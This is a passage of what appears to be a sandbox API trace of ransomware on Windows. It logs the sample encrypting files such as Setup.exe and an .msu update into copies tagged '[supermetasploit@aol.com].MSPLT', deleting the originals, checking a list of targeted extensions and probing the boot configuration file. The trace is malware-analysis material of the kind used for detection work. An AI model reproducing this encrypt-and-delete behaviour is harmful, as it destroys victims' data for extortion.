lpBuffer=0x3d6b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0179.812] WriteFile (in: hFile=0x388, lpBuffer=0x3d6b020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesWritten=0x37dfc94*=0xe6, lpOverlapped=0x0) returned 1 [0179.812] SetEndOfFile (hFile=0x388) returned 1 [0179.812] CloseHandle (hObject=0x388) returned 1 [0179.815] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0179.815] SetEndOfFile (hFile=0x2d4) returned 1 [0179.818] CloseHandle (hObject=0x2d4) returned 1 [0179.818] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Setup.exe.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0179.819] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Setup.exe" (normalized: "c:\\588bce7c90097ed212\\setup.exe")) returned 1 [0179.821] lstrlenW (lpString="C:\\588bce7c90097ed212\\Setup.exe") returned 31 [0179.821] lstrlenW (lpString="C:\\588bce7c90097ed212\\Setup.exe") returned 31 [0179.821] lstrlenW (lpString=".doc") returned 4 [0179.821] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0179.821] lstrlenW (lpString=".docx") returned 5 [0179.821] lstrcmpiW (lpString1=".docx", lpString2="p.exe") returned -1 [0179.821] lstrlenW (lpString=".pdf") returned 4 [0179.821] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0179.821] lstrlenW (lpString=".xls") returned 4 [0179.821] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0179.821] lstrlenW (lpString=".xlsx") returned 5 [0179.821] lstrcmpiW (lpString1=".xlsx", lpString2="p.exe") returned -1 [0179.821] lstrlenW (lpString=".ppt") returned 4 [0179.821] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0179.821] lstrlenW (lpString="C:\\588bce7c90097ed212\\Setup.exe") returned 31 [0179.821] lstrlenW (lpString=".zip") returned 4 [0179.821] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0179.821] lstrlenW (lpString=".rar") returned 4 [0179.821] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0179.821] lstrlenW (lpString=".bz2") returned 4 [0179.821] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0179.821] lstrlenW (lpString=".7z") returned 3 [0179.821] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0179.821] lstrlenW (lpString="C:\\588bce7c90097ed212\\Setup.exe") returned 31 [0179.822] lstrlenW (lpString=".dbf") returned 4 [0179.822] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0179.822] lstrlenW (lpString="C:\\588bce7c90097ed212\\Setup.exe") returned 31 [0179.822] lstrlenW (lpString=".1cd") returned 4 [0179.822] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0179.822] lstrlenW (lpString="C:\\588bce7c90097ed212\\Setup.exe") returned 31 [0179.822] lstrlenW (lpString=".jpg") returned 4 [0179.822] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0179.822] lstrlenW (lpString="C:\\588bce7c90097ed212\\Setup.exe") returned 31 [0179.822] lstrlenW (lpString="C:\\588bce7c90097ed212\\Setup.exe") returned 31 [0179.822] lstrlenW (lpString=".doc") returned 4 [0179.822] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0179.822] lstrlenW (lpString=".docx") returned 5 [0179.822] lstrcmpiW (lpString1=".docx", lpString2="p.exe") returned -1 [0179.822] lstrlenW (lpString=".pdf") returned 4 [0179.822] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0179.822] lstrlenW (lpString=".xls") returned 4 [0179.822] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0179.822] lstrlenW (lpString=".xlsx") returned 5 [0179.822] lstrcmpiW (lpString1=".xlsx", lpString2="p.exe") returned -1 [0179.822] lstrlenW (lpString=".ppt") returned 4 [0179.822] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0179.822] lstrlenW (lpString="C:\\588bce7c90097ed212\\Setup.exe") returned 31 [0179.822] lstrlenW (lpString=".zip") returned 4 [0179.822] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0179.822] lstrlenW (lpString=".rar") returned 4 [0179.823] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0179.823] lstrlenW (lpString=".bz2") returned 4 [0179.823] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0179.823] lstrlenW (lpString=".7z") returned 3 [0179.823] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0179.823] lstrlenW (lpString="C:\\588bce7c90097ed212\\Setup.exe") returned 31 [0179.823] lstrlenW (lpString=".dbf") returned 4 [0179.823] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0179.823] lstrlenW (lpString="C:\\588bce7c90097ed212\\Setup.exe") returned 31 [0179.823] lstrlenW (lpString=".1cd") returned 4 [0179.823] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0179.823] lstrlenW (lpString="C:\\588bce7c90097ed212\\Setup.exe") returned 31 [0179.823] lstrlenW (lpString=".jpg") returned 4 [0179.823] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0179.823] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0179.823] lstrlenW (lpString="SetupEngine.dll") returned 15 [0179.823] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupEngine.dll" (normalized: "c:\\588bce7c90097ed212\\setupengine.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0179.824] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=807256) returned 1 [0179.824] CloseHandle (hObject=0x384) returned 1 [0179.825] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\SetupEngine.dll" (normalized: "c:\\588bce7c90097ed212\\setupengine.dll")) returned 0x80 [0179.825] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\SetupEngine.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\setupengine.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0179.825] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupEngine.dll" (normalized: "c:\\588bce7c90097ed212\\setupengine.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0179.825] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0179.825] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0179.825] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupEngine.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\setupengine.dll.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0179.827] GetLastError () returned 0x0 [0179.827] ReadFile (in: hFile=0x384, lpBuffer=0x3d6b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesRead=0x37dfecc*=0xc5158, lpOverlapped=0x0) returned 1 [0180.195] WriteFile (in: hFile=0x2d4, lpBuffer=0x3d6b020*, nNumberOfBytesToWrite=0xc5160, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesWritten=0x37dfc94*=0xc5160, lpOverlapped=0x0) returned 1 [0180.210] ReadFile (in: hFile=0x384, lpBuffer=0x3d6b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0180.210] WriteFile (in: hFile=0x2d4, lpBuffer=0x3d6b020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesWritten=0x37dfc94*=0xf2, lpOverlapped=0x0) returned 1 [0180.210] SetEndOfFile (hFile=0x2d4) returned 1 [0180.211] CloseHandle (hObject=0x2d4) returned 1 [0180.227] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0180.227] SetEndOfFile (hFile=0x384) returned 1 [0181.554] CloseHandle (hObject=0x384) returned 1 [0181.554] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\SetupEngine.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0181.554] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\SetupEngine.dll" (normalized: "c:\\588bce7c90097ed212\\setupengine.dll")) returned 1 [0181.555] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupEngine.dll") returned 37 [0181.555] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupEngine.dll") returned 37 [0181.555] lstrlenW (lpString=".doc") returned 4 [0181.555] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0181.555] lstrlenW (lpString=".docx") returned 5 [0181.555] lstrcmpiW (lpString1=".docx", lpString2="e.dll") returned -1 [0181.555] lstrlenW (lpString=".pdf") returned 4 [0181.555] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0181.555] lstrlenW (lpString=".xls") returned 4 [0181.555] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0181.555] lstrlenW (lpString=".xlsx") returned 5 [0181.555] lstrcmpiW (lpString1=".xlsx", lpString2="e.dll") returned -1 [0181.555] lstrlenW (lpString=".ppt") returned 4 [0181.555] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0181.555] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupEngine.dll") returned 37 [0181.555] lstrlenW (lpString=".zip") returned 4 [0181.555] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0181.555] lstrlenW (lpString=".rar") returned 4 [0181.555] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0181.555] lstrlenW (lpString=".bz2") returned 4 [0181.555] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0181.555] lstrlenW (lpString=".7z") returned 3 [0181.555] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0181.555] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupEngine.dll") returned 37 [0181.555] lstrlenW (lpString=".dbf") returned 4 [0181.556] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0181.556] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupEngine.dll") returned 37 [0181.556] lstrlenW (lpString=".1cd") returned 4 [0181.556] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0181.556] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupEngine.dll") returned 37 [0181.556] lstrlenW (lpString=".jpg") returned 4 [0181.556] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0181.556] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupEngine.dll") returned 37 [0181.556] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupEngine.dll") returned 37 [0181.556] lstrlenW (lpString=".doc") returned 4 [0181.556] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0181.556] lstrlenW (lpString=".docx") returned 5 [0181.556] lstrcmpiW (lpString1=".docx", lpString2="e.dll") returned -1 [0181.556] lstrlenW (lpString=".pdf") returned 4 [0181.556] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0181.556] lstrlenW (lpString=".xls") returned 4 [0181.556] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0181.556] lstrlenW (lpString=".xlsx") returned 5 [0181.556] lstrcmpiW (lpString1=".xlsx", lpString2="e.dll") returned -1 [0181.556] lstrlenW (lpString=".ppt") returned 4 [0181.556] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0181.556] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupEngine.dll") returned 37 [0181.556] lstrlenW (lpString=".zip") returned 4 [0181.556] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0181.556] lstrlenW (lpString=".rar") returned 4 [0181.556] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0181.556] lstrlenW (lpString=".bz2") returned 4 [0181.556] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0181.556] lstrlenW (lpString=".7z") returned 3 [0181.556] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0181.556] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupEngine.dll") returned 37 [0181.556] lstrlenW (lpString=".dbf") returned 4 [0181.556] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0181.556] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupEngine.dll") returned 37 [0181.557] lstrlenW (lpString=".1cd") returned 4 [0181.557] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0181.557] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupEngine.dll") returned 37 [0181.557] lstrlenW (lpString=".jpg") returned 4 [0181.557] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0181.557] lstrcmpiW (lpString1=".msu", lpString2=".MSPLT") returned 1 [0181.557] lstrlenW (lpString="Windows6.0-KB956250-v6001-x64.msu") returned 33 [0181.557] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x64.msu"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0181.598] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=5198099) returned 1 [0181.598] CloseHandle (hObject=0x2f4) returned 1 [0181.598] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x64.msu")) returned 0x80 [0181.599] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x64.msu.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0181.599] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x64.msu"), lpNewFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x64.msu.id-b4197730.[supermetasploit@aol.com].msplt")) returned 1 [0181.600] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x64.msu.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0181.600] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfc64 | out: lpNewFilePointer=0x0) returned 1 [0181.600] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfc24 | out: lpNewFilePointer=0x0) returned 1 [0181.600] ReadFile (in: hFile=0x2f4, lpBuffer=0x3d6b058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x37dfc30, lpOverlapped=0x0 | out: lpBuffer=0x3d6b058*, lpNumberOfBytesRead=0x37dfc30*=0x40000, lpOverlapped=0x0) returned 1 [0181.649] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x1a705b, lpNewFilePointer=0x0, dwMoveMethod=0x37dfc24 | out: lpNewFilePointer=0x0) returned 1 [0181.649] ReadFile (in: hFile=0x2f4, lpBuffer=0x3dab058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x37dfc30, lpOverlapped=0x0 | out: lpBuffer=0x3dab058*, lpNumberOfBytesRead=0x37dfc30*=0x40000, lpOverlapped=0x0) returned 1 [0181.670] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x37dfc64 | out: lpNewFilePointer=0xffffffff) returned 1 [0181.670] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x4b5113, lpNewFilePointer=0x0, dwMoveMethod=0x37dfc24 | out: lpNewFilePointer=0x0) returned 1 [0181.670] ReadFile (in: hFile=0x2f4, lpBuffer=0x3deb058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x37dfc30, lpOverlapped=0x0 | out: lpBuffer=0x3deb058*, lpNumberOfBytesRead=0x37dfc30*=0x40000, lpOverlapped=0x0) returned 1 [0181.737] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0181.737] WriteFile (in: hFile=0x2f4, lpBuffer=0x3d6b020*, nNumberOfBytesToWrite=0xc012e, lpNumberOfBytesWritten=0x37dfca8, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesWritten=0x37dfca8*=0xc012e, lpOverlapped=0x0) returned 1 [0182.745] SetEndOfFile (hFile=0x2f4) returned 1 [0182.745] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x40000) returned 0x3ff82b8 [0182.753] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfc74 | out: lpNewFilePointer=0x0) returned 1 [0182.753] WriteFile (in: hFile=0x2f4, lpBuffer=0x3ff82b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x37dfc80, lpOverlapped=0x0 | out: lpBuffer=0x3ff82b8*, lpNumberOfBytesWritten=0x37dfc80*=0x40000, lpOverlapped=0x0) returned 1 [0182.755] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x1a705b, lpNewFilePointer=0x0, dwMoveMethod=0x37dfc74 | out: lpNewFilePointer=0x0) returned 1 [0182.755] WriteFile (in: hFile=0x2f4, lpBuffer=0x3ff82b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x37dfc80, lpOverlapped=0x0 | out: lpBuffer=0x3ff82b8*, lpNumberOfBytesWritten=0x37dfc80*=0x40000, lpOverlapped=0x0) returned 1 [0182.758] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x4b5113, lpNewFilePointer=0x0, dwMoveMethod=0x37dfc74 | out: lpNewFilePointer=0x0) returned 1 [0182.758] WriteFile (in: hFile=0x2f4, lpBuffer=0x3ff82b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x37dfc80, lpOverlapped=0x0 | out: lpBuffer=0x3ff82b8*, lpNumberOfBytesWritten=0x37dfc80*=0x40000, lpOverlapped=0x0) returned 1 [0182.761] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ff82b8 | out: hHeap=0x710000) returned 1 [0183.316] CloseHandle (hObject=0x2f4) returned 1 [0185.726] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0185.727] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu") returned 55 [0185.727] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu") returned 55 [0185.727] lstrlenW (lpString=".doc") returned 4 [0185.727] lstrcmpiW (lpString1=".doc", lpString2=".msu") returned -1 [0185.727] lstrlenW (lpString=".docx") returned 5 [0185.727] lstrcmpiW (lpString1=".docx", lpString2="4.msu") returned -1 [0185.727] lstrlenW (lpString=".pdf") returned 4 [0185.727] lstrcmpiW (lpString1=".pdf", lpString2=".msu") returned 1 [0185.727] lstrlenW (lpString=".xls") returned 4 [0185.727] lstrcmpiW (lpString1=".xls", lpString2=".msu") returned 1 [0185.727] lstrlenW (lpString=".xlsx") returned 5 [0185.727] lstrcmpiW (lpString1=".xlsx", lpString2="4.msu") returned -1 [0185.727] lstrlenW (lpString=".ppt") returned 4 [0185.727] lstrcmpiW (lpString1=".ppt", lpString2=".msu") returned 1 [0185.727] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu") returned 55 [0185.727] lstrlenW (lpString=".zip") returned 4 [0185.728] lstrcmpiW (lpString1=".zip", lpString2=".msu") returned 1 [0185.728] lstrlenW (lpString=".rar") returned 4 [0185.728] lstrcmpiW (lpString1=".rar", lpString2=".msu") returned 1 [0185.728] lstrlenW (lpString=".bz2") returned 4 [0185.728] lstrcmpiW (lpString1=".bz2", lpString2=".msu") returned -1 [0185.728] lstrlenW (lpString=".7z") returned 3 [0185.728] lstrcmpiW (lpString1=".7z", lpString2="msu") returned -1 [0185.728] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu") returned 55 [0185.728] lstrlenW (lpString=".dbf") returned 4 [0185.728] lstrcmpiW (lpString1=".dbf", lpString2=".msu") returned -1 [0185.728] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu") returned 55 [0185.728] lstrlenW (lpString=".1cd") returned 4 [0185.728] lstrcmpiW (lpString1=".1cd", lpString2=".msu") returned -1 [0185.728] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu") returned 55 [0185.728] lstrlenW (lpString=".jpg") returned 4 [0185.728] lstrcmpiW (lpString1=".jpg", lpString2=".msu") returned -1 [0185.728] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu") returned 55 [0185.728] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu") returned 55 [0185.728] lstrlenW (lpString=".doc") returned 4 [0185.728] lstrcmpiW (lpString1=".doc", lpString2=".msu") returned -1 [0185.728] lstrlenW (lpString=".docx") returned 5 [0185.728] lstrcmpiW (lpString1=".docx", lpString2="4.msu") returned -1 [0185.728] lstrlenW (lpString=".pdf") returned 4 [0185.729] lstrcmpiW (lpString1=".pdf", lpString2=".msu") returned 1 [0185.729] lstrlenW (lpString=".xls") returned 4 [0185.729] lstrcmpiW (lpString1=".xls", lpString2=".msu") returned 1 [0185.729] lstrlenW (lpString=".xlsx") returned 5 [0185.729] lstrcmpiW (lpString1=".xlsx", lpString2="4.msu") returned -1 [0185.729] lstrlenW (lpString=".ppt") returned 4 [0185.729] lstrcmpiW (lpString1=".ppt", lpString2=".msu") returned 1 [0185.729] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu") returned 55 [0185.729] lstrlenW (lpString=".zip") returned 4 [0185.729] lstrcmpiW (lpString1=".zip", lpString2=".msu") returned 1 [0185.729] lstrlenW (lpString=".rar") returned 4 [0185.729] lstrcmpiW (lpString1=".rar", lpString2=".msu") returned 1 [0185.729] lstrlenW (lpString=".bz2") returned 4 [0185.729] lstrcmpiW (lpString1=".bz2", lpString2=".msu") returned -1 [0185.729] lstrlenW (lpString=".7z") returned 3 [0185.729] lstrcmpiW (lpString1=".7z", lpString2="msu") returned -1 [0185.729] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu") returned 55 [0185.729] lstrlenW (lpString=".dbf") returned 4 [0185.729] lstrcmpiW (lpString1=".dbf", lpString2=".msu") returned -1 [0185.729] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu") returned 55 [0185.729] lstrlenW (lpString=".1cd") returned 4 [0185.729] lstrcmpiW (lpString1=".1cd", lpString2=".msu") returned -1 [0185.729] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu") returned 55 [0185.729] lstrlenW (lpString=".jpg") returned 4 [0185.729] lstrcmpiW (lpString1=".jpg", lpString2=".msu") returned -1 [0185.730] lstrlenW (lpString="BCD") returned 3 [0185.730] CreateFileW (lpFileName="C:\\Boot\\BCD" (normalized: "c:\\boot\\bcd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.730] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0185.730] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0185.730] lstrlenW (lpString=".doc") returned 4 [0185.730] lstrcmpiW (lpString1=".doc", lpString2="\\BCD") returned -1 [0185.730] lstrlenW (lpString=".docx") returned 5 [0185.730] lstrcmpiW (lpString1=".docx", lpString2="t\\BCD") returned -1 [0185.730] lstrlenW (lpString=".pdf") returned 4 [0185.730] lstrcmpiW (lpString1=".pdf", lpString2="\\BCD") returned -1 [0185.730] lstrlenW (lpString=".xls") returned 4 [0185.730] lstrcmpiW (lpString1=".xls", lpString2="\\BCD") returned -1 [0185.730] lstrlenW (lpString=".xlsx") returned 5 [0185.730] lstrcmpiW (lpString1=".xlsx", lpString2="t\\BCD") returned -1 [0185.730] lstrlenW (lpString=".ppt") returned 4 [0185.730] lstrcmpiW (lpString1=".ppt", lpString2="\\BCD") returned -1 [0185.731] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0185.731] lstrlenW (lpString=".zip") returned 4 [0185.731] lstrcmpiW (lpString1=".zip", lpString2="\\BCD") returned -1 [0185.731] lstrlenW (lpString=".rar") returned 4 [0185.731] lstrcmpiW (lpString1=".rar", lpString2="\\BCD") returned -1 [0185.731] lstrlenW (lpString=".bz2") returned 4 [0185.731] lstrcmpiW (lpString1=".bz2", lpString2="\\BCD") returned -1 [0185.731] lstrlenW (lpString=".7z") returned 3 [0185.731] lstrcmpiW (lpString1=".7z", lpString2="BCD") returned -1 [0185.731] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0185.731] lstrlenW (lpString=".dbf") returned 4 [0185.731] lstrcmpiW (lpString1=".dbf", lpString2="\\BCD") returned -1 [0185.731] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0185.731] lstrlenW (lpString=".1cd") returned 4 [0185.731] lstrcmpiW (lpString1=".1cd", lpString2="\\BCD") returned -1 [0185.731] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0185.731] lstrlenW (lpString=".jpg") returned 4 [0185.731] lstrcmpiW (lpString1=".jpg", lpString2="\\BCD") returned -1 [0185.731] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0185.731] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0185.731] lstrlenW (lpString=".doc") returned 4 [0185.731] lstrcmpiW (lpString1=".doc", lpString2="\\BCD") returned -1 [0185.731] lstrlenW (lpString=".docx") returned 5 [0185.731] lstrcmpiW (lpString1=".docx", lpString2="t\\BCD") returned -1 [0185.732] lstrlenW (lpString=".pdf") returned 4 [0185.732] lstrcmpiW (lpString1=".pdf", lpString2="\\BCD") returned -1 [0185.732] lstrlenW (lpString=".xls") returned 4 [0185.732] lstrcmpiW (lpString1=".xls", lpString2="\\BCD") returned -1 [0185.732] lstrlenW (lpString=".xlsx") returned 5 [0185.732] lstrcmpiW (lpString1=".xlsx", lpString2="t\\BCD") returned -1 [0185.732] lstrlenW (lpString=".ppt") returned 4 [0185.732] lstrcmpiW (lpString1=".ppt", lpString2="\\BCD") returned -1 [0185.732] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0185.732] lstrlenW (lpString=".zip") returned 4 [0185.732] lstrcmpiW (lpString1=".zip", lpString2="\\BCD") returned -1 [0185.732] lstrlenW (lpString=".rar") returned 4 [0185.732] lstrcmpiW 